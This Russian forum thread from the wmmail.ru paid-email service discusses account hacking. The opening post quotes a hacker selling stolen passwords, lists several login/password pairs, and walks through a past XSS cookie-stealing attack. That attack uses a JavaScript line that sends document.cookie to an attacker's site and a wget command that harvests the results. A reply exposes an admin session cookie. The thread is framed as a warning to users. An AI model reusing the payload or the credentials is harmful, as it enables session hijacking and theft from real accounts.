wmmail.ru – cервис почтовых рассылок на главную
написать письмо
карта сайта

С чего начать?РекламодательПравилаFAQСтатистикаБиржа статейTOP100ФоткиКонтакты
Логин:
Пароль: 
Регистрация   Забыли пароль?
WMLogin
Пользователей всего:

516332

Пользователей сегодня:

34

Пользователей online:

162

Выплачено ($): 7`614`342,89
Выплат: 8`122`754
Писем прочитано: 1`025`006`461

 
 
Online 4
Все ответы
 
 

Тема #5147

Внимание! В разделе запрещается:

  • Мат (оскорбления)
  • Частично реклама
  • Нарушение законодательства РФ
  • Попрошайничество и просьбы одолжить деньги, кредиты или монеты

Выделите текст и нажмите для цитирования  #  
+38   [13.02.2011 18:05] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123

Закрытая тема от пользователя Gufaka КТО вас взламывает !!!!!

На одном из форумов мо взлому Вммайл...
1 = Хакер
2 = другие пользователи
1:Эта тема- для тех= кто не \ночет читать письма и выполнять задания . Предлагаю свои услуги по взлому аккаунтов-= Я буду выкладывать по 5 аккаунтов в ниделю\= что бы докозать что у меня есть доступ к ковсем логинам -=67 Выкладывать буду только те аккаунты где есть дополнительная - защита. НО уменя есть и пароли для операций каторые я могу вам продать за 10 паролей стоит $50 Решайти сами. А пока проверяйте первые пять логинов
nemecz 1120387
Skalotskiy 07061988
DrVirus aspirine
mzn
Zeleboba joker
Snowlind 112233
web134 327393
faerman azsxdcazsxdc
Кстати посмотреть ихний баланс и рефов можно через эту программуsad.gif*
http://www.wmmail.ru/mailkeeper/2300/MailKeeperSetup_2.3.exe
Ну как удовлетворе7н тогда читай дальше оплатив $50 получиш 20 логинов с паролями и паролями для операций.
Снять все деньги можно через систему рефералов КАК? очень просто покупаеш самого8 дешевог9 рефа своим аккау6нтом и продаеш за ту цену сколько будит у логина,!!!11111110кек
2:А сколько стоит отдельный игрок? Дапустим yurawmz или Modjo
1:Отдельный аккаунт стоит $100
2:Ну хорошо Я заплачу тебе. Но сначала взломай мой акаунт
1:Твоя торпеда запущена ?;№ mad.gif
Добавлено в 16.04.2008 - 16:49
Valkos 1181890254........ X78k693Tvz
..... Я надеюсь мне не надо продолжать? Ха! Ха! Ха!
2:я свой пороль уже сменил, чего и вам советую
1:От того что ты сменил пароль ничего не измениться845ь и снимать деньги я не буду не волнуйтесь.......Может наконец админ проснется и залатает свою дарочку пока не .... ну не важно
2:а за сколько бы ты продал админу свой секрет? ну или например мне?
1:вы юзерки89 наверное не врубаитесь- = что отправлять лично пароль я больше не буду. У меня есть пароль от Admin 7 панели :; может вам и его выложить. Суть хакера заключается не втом что4 б взламать и ограбить а втом чтоб0 покозать что да я умею взламывать серваки . Ксати интересует токая ху..ня как PLATI/ru


Дальше - нет смысла
Но вот еще: вы заметили как увеличилось количество серфинга? Читаем дальше...


Настала пора раскрыть карты и выложить все широкой публике
Уязвимость скрывалась (впрочем почему скрывалась? До сих пор скрывается ) в реффссылке вы увидите свои куки. Теперь, собственно, реализация атаки. В серфинге крутим страничку, например www.mybadsite.ru/grab.html содержащую следующий HTML код.

Код


Скрыто








Отсюда мы видим, что в страничку регистрации WMMail инжектируется чужой javascript с другого сайта, с моего то есть. Вот содержание этого файла

Код
document.location = "http://www.mybadsite.ru/scan.php?cook=" + document.cookie;

Все, одна строчка Скрипт заставляет браузер перейти на скрипт на моем сайте, передав ему в качестве параметра куки жертвы.
Вот код скрипта собирающего куки.



Скрипт берет куки, выдирает из него значимую часть, подготавливает ссылку и записывает готовую ссылку на личные данные в файл. Включаемый файл page.html может быть любой страничкой, например вашей рекламой.
Теперь собственно о получении паролей. Можно конечно открывать по очереди все ссылки в браузере, предварительно выключив в нем поддержку кукисов. Но так как я юзаю линукс, то я сделал все одной строчкой в консоли:

Код

xaoc@epsilon:~/passwords$ wget http://www.mybadsite.ru/cookies.txt && wget -i cookies.txt

Вот и все. Через несколько минут все странички слиты и можно спокойно начинать выдергивать из них логины и пароли
Думаю это кому нибудь пригодится.

Cейчас конкретно эта ошибка исправлена, но простая подстановка js в страницу регистрации показывает, что:

* Не ставится кука с реферером, который передается в ссылке! В лучшем случае он хранится в сессии, но это однозначно показывает, что рефералы неизбежно будут "теряться".
* Дыра была закрыта на скорую руку и еще вопрос насколько качественно. Вместо жесткого приведения типа и применяется простой htmlspecialchars, т.к. уже прошло не менее недели, то можно считать это показателям качество кода проекта и успешно искать новые дыры. Например, в форме контактов вводимые данные не контролируются на валидность (подобной уязвимости нет)

Мораль сего примера для участников:

* сложные пароли не гарантируют безопасномть аккаунта, из-за ошибок программистов;
* типовые проекты наиболее уязвимы;
* нажимайте кнопку "Выход" - при логауте, удялаются куки и сессии;
* пароли надо регулярно менять;
* администрации WMMail.ru - не есть ни пить, закрывать дыры и неказистую работу скриптов, добавляя валидацию данных по типу и формату;
* всем админам со скриптами CGYP срочно проверять свои проекты :)

Раздел: WMmail.ru - Мой аккаунт, последний комментарий: 14.02.2011 14:06
Тема закрыта автором
Проголосовали: IZZE, rotor87, Sildae, aleksachka25, ryfNatali, #874094, #868226, #778830, #676938, Alekoos, #841493, MiSsiS_IA, tridin, #713388, egorius, kavia, clubok, #786505, andriys, romuych, #816222, Demonkz, #735257, Energetikss, #819409, #537587, Vaxal, denkor, #758480, euro7, ArefievVyacheslav, #834467, #750774, #822458, xanuka, #896653, ANGEL88, #725416, PROFIGROK, smail2133

Страницы: 1 2

Ответы
Ответов всего: 80  тема закрыта 
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 18:56] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

admin пишет
Gufaka пишет Уважаемый, админ, вы-же сами знаете, что любой сайт взломать гораздо легче, чем кипер, разве-что Bank of America.

те, кто жаловался на взлом говорили, что у них был взломан кипер, а значит причина именно в нем, а не в дырках на сайте
если стоит дополнительная защита аккаунта, сложный не повторяющийся пароль, и нормальный антивирус, взлома аккаунта можно не бояться

Взломать e-num - практически невозможно, а что-бы взломать кипер, нужно как минимум знать точную дату рождения.
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 18:57] #737980   Все ответы пользователя

#846720 пишет Просмотрено сайтов в серфинге:63
Просмотрено сайтов в автосерфинге:397
зарегился с начала января
пароль не менял
жду взлом :cool:

:lol::lol:
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 18:59] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

admin пишет 4c6c3b43d1e8a386882160dad918bde0

Спасибо:lol: записал
Выделите текст и нажмите для цитирования  #  
+2   [13.02.2011 19:00] #499372   Все ответы пользователя

aleksachka25 пишет mzn,зарегистрировался в 2009...

Там про мой старый аккаунт, зарегистрированный в 2005 году:smile:
И вмид, на который был зареган старый акк, уже давным-давно потерян.
Проголосовали: aleksachka25, #750774
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:00] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

admin пишет
Gufaka пишет Куки в архив и сюда: gufaka-zm@yandex.ru
Потом без обид.

какой архив?, вот моя текущая сессия
Cookie wmmailru=4c6c3b43d1e8a386882160dad918bde0

попробуйте, назовите мне баланс моего аккаунта? :)

А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель :thumbsup:
Выделите текст и нажмите для цитирования  #  
+1   [13.02.2011 19:02] #754139   Все ответы пользователя

ЭТИ СТАТЬИ 100 ЛЕТНЕЙ ДАВНОСТИ!
...В ТЕ ВРЕМЕНА WMMAIL БЫЛ ДЫРЯВ КАК СЫР!
ХОТЯ КУКИ МОЖНО УКРАСТЬ И СЕЙЧАС, НО ЭТО НИЧЕГО НЕ ДАСТ...
ПРИ ПОДСТАВЛЕНИИ КУКИСОВ ДАЖЕ ЕСЛИ ДОП.ЗАЩИТА ОТКЛЮЧЕНА...ВЫЛАЗИЕТ-У вас изменился браузер или IP перезайдите!
А там форма для логина и пароля...
Проголосовали: #866951
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:03] #499372   Все ответы пользователя

Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:06] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:06] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Куки могут быть украдены с помощью анализа трафика — это называется взломом сессии. Сетевой трафик может быть перехвачен и прочитан не только его отправителем и получателем (особенно в публичных сетях Wi-Fi). Этот трафик включает в себя и куки, передаваемые через незашифрованные HTTP-сессии. Там, где сетевой трафик не шифруется, злоумышленники могут прочесть сообщения пользователей сети, в том числе их куки, используя программы, называемые сниферами.

Добавлено спустя 21 секунду
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Админ выложил свои куки
Выделите текст и нажмите для цитирования  #  
+2   [13.02.2011 19:08] Narbias Рейтинг 663.89     Стена пользователя Narbias +122  Все ответы пользователя Narbias

А теперь подумайте:
Какой дурачек стал бы продавать пароли от аккаунтов с лежащими на них деньгами??? :shocking:
Проголосовали: Rade442, #29968
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:10] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

Gufaka пишет Куки могут быть украдены с помощью анализа трафика — это называется взломом сессии. Сетевой трафик может быть перехвачен и прочитан не только его отправителем и получателем (особенно в публичных сетях Wi-Fi). Этот трафик включает в себя и куки, передаваемые через незашифрованные HTTP-сессии. Там, где сетевой трафик не шифруется, злоумышленники могут прочесть сообщения пользователей сети, в том числе их куки, используя программы, называемые сниферами.

Добавлено спустя 21 секунду
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Админ выложил свои куки

куки для входа на сайт а так у него нет ака ну я точно не знаю но админ панель точно есть я их знаю их вроде 2!
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:10] #846720   Все ответы пользователя

Narbias пишет Какой дурачек стал бы продавать пароли от аккаунтов

тот который смог бы взломать:lol:
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:12] Narbias Рейтинг 663.89     Стена пользователя Narbias +122  Все ответы пользователя Narbias

Crysis61 пишет
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail

Сколько у меня денег на счету?
Выделите текст и нажмите для цитирования  #  
+1   [13.02.2011 19:13] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Narbias пишет А теперь подумайте:
Какой дурачек стал бы продавать пароли от аккаунтов с лежащими на них деньгами??? :shocking:

Не обязательно ради денег, вы думаете Наташе ради денег взломали, не увели ни денег, ни рефералов, а только напакостили.
Проголосовали: ryfNatali
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:20] #889302   Все ответы пользователя

Crysis61 пишет Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail

сколько у меня?
Выделите текст и нажмите для цитирования  #  
-1   [13.02.2011 19:20] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

Narbias пишет
Crysis61 пишет
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail

Сколько у меня денег на счету?

Бага больше нет я все админу рассказал :tongue:
Проголосовали: #750774
Выделите текст и нажмите для цитирования  #  
+1   [13.02.2011 19:20] nasecka Рейтинг 0.00     Стена пользователя nasecka +418  Все ответы пользователя nasecka

Narbias пишет А теперь подумайте:
Какой дурачек стал бы продавать пароли от аккаунтов с лежащими на них деньгами??? :shocking:

Gufaka пишет Суть хакера заключается не втом что4 б взламать и ограбить а втом чтоб0 покозать что да я умею взламывать серваки
Проголосовали: Gufaka
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:27] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Crysis61 пишет
Narbias пишет
Crysis61 пишет
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail

Сколько у меня денег на счету?

Бага больше нет я все админу рассказал :tongue:

Ну-ну...
Выделите текст и нажмите для цитирования  #  
+3   [13.02.2011 19:30] Rade442 Рейтинг 0.00     Стена пользователя Rade442 +97  Все ответы пользователя Rade442

Crysis61 пишет
Narbias пишет
Crysis61 пишет
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail

Сколько у меня денег на счету?

Бага больше нет я все админу рассказал :tongue:

правдиво звучит:dry:
Проголосовали: Gufaka, #721757, #750774
Выделите текст и нажмите для цитирования  #  
+1   [13.02.2011 19:37] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

Rade442 пишет
Crysis61 пишет
Narbias пишет
Crysis61 пишет
#499372 пишет
Crysis61 пишет А кстати у админа нет аккаунта на wmmail я баланс смотрел он заходит через админ панель

Да аккаунт админа и есть одна большая админ-панель:smile:
Как баланс смотрел?

Я нашел на сайте баг который позволял смотреть баланс любого ака на wmmail

Сколько у меня денег на счету?

Бага больше нет я все админу рассказал :tongue:

правдиво звучит:dry:

Не веришь спроси админа !:thumbsup:

Добавлено спустя 05 минут 33 секунды
Я еще помню как я над реферером прикалывался "На вашем балансе столко $ и столько CR" :lol: админ врать не будет спроси
Проголосовали: #499372
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 19:48] #499372   Все ответы пользователя

Crysis61 правду говорит.
Выделите текст и нажмите для цитирования  #  
+2   [13.02.2011 19:53] ryfNatali Рейтинг 3853.55     Стена пользователя ryfNatali +812  Все ответы пользователя ryfNatali

admin пишет отправка смс стоит денег, вы хотите платить за каждую смс?

Я согласна платить, пусть эта допзащита будет по желанию пользователя.:yes:
Проголосовали: #499372, efox77
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 20:10] denkor Рейтинг 136.76     Стена пользователя denkor +62  Все ответы пользователя denkor

ryfNatali пишет
admin пишет отправка смс стоит денег, вы хотите платить за каждую смс?

Я согласна платить, пусть эта допзащита будет по желанию пользователя.:yes:

Я тоже согласен платить. Хочу чтобы мой акк должен быть 100% защищен!
Только еще должна быть возможность вкл/выкл данной функции.
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 20:15] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Вот еще:
"Проверил, действительно выделеный сервер :) Причем на нем крутится не только почтовик, но и много интересных вещей. Немного понасиловав DNS сервер этого сервака, я нашел еще несколько проектов, которые пока еще не работают, но мы можем их увидеть в будущем. Итак, список в студию :)

agent.wmmail.ru - что это будет, доподлинно неизвестно. Пока что.
banners.wmmail.ru - тоже чтото неизвестное, но название уже наводит на мысли :)
prsys.wmmail.ru - Похоже на еще один сайт о заработке с разжевыванием что да как.
sms.wmmail.ru - Пополнение вебманей с помощью SMS.

Похоже у админа грандиозные планы :)
P. S. Все это я смог вытащить, благодаря криво настроеному DNS-серверу, сдается мне там таких кривых настроек навалом."
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 20:54] ArefievVyacheslav Рейтинг 0.00     Стена пользователя ArefievVyacheslav +28  Все ответы пользователя ArefievVyacheslav

Ты не задолбался это писать ради 4 центов и 2 кредитов?:shocking:
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 21:22] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Это не задания, при чем тут центы и кредиты????:shocking: Просто надоело видеть как каждый день кого-то взламывают.
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 21:28] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

Gufaka пишет Это не задания, при чем тут центы и кредиты????:shocking: Просто надоело видеть как каждый день кого-то взламывают.

Да ты морально поддержал админа чтобы он закрыл все дырки и скрипты подправил тема вообще без смысла написал то что было уже давно :hands::arrow:
Выделите текст и нажмите для цитирования  #  
0   [13.02.2011 23:05] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Crysis61 пишет
Gufaka пишет Это не задания, при чем тут центы и кредиты????:shocking: Просто надоело видеть как каждый день кого-то взламывают.

Да ты морально поддержал админа чтобы он закрыл все дырки и скрипты подправил тема вообще без смысла написал то что было уже давно :hands::arrow:

Ставь запятые, а то твой бред читать не возможно:fool::haha:
Выделите текст и нажмите для цитирования  #  
0   [14.02.2011 10:50] Crysis61 Рейтинг 0.00     Стена пользователя Crysis61 +40  Все ответы пользователя Crysis61

Gufaka пишет
Crysis61 пишет
Gufaka пишет Это не задания, при чем тут центы и кредиты????:shocking: Просто надоело видеть как каждый день кого-то взламывают.

Да ты морально поддержал админа чтобы он закрыл все дырки и скрипты подправил тема вообще без смысла написал то что было уже давно :hands::arrow:

Ставь запятые, а то твой бред читать не возможно:fool::haha:

А я твой "бред" читал!Так что будем квиты:ok: (у меня просто клавиша не работает)
Выделите текст и нажмите для цитирования  #  
0   [14.02.2011 14:06] Gufaka Рейтинг 0.00     Стена пользователя Gufaka +123  Все ответы пользователя Gufaka

Crysis61 пишет
Gufaka пишет
Crysis61 пишет
Gufaka пишет Это не задания, при чем тут центы и кредиты????:shocking: Просто надоело видеть как каждый день кого-то взламывают.

Да ты морально поддержал админа чтобы он закрыл все дырки и скрипты подправил тема вообще без смысла написал то что было уже давно :hands::arrow:

Ставь запятые, а то твой бред читать не возможно:fool::haha:

А я твой "бред" читал!Так что будем квиты:ok: (у меня просто клавиша не работает)

Хорошо:ok:

Страницы: 1 2


НОВОСТИ
04.06.2024Заказ средств на WebMoney
подробнее>>
19.04.2024Технические работы с СБП
подробнее>>

© 2004-2024 «WMMAIL» Пользовательское соглашение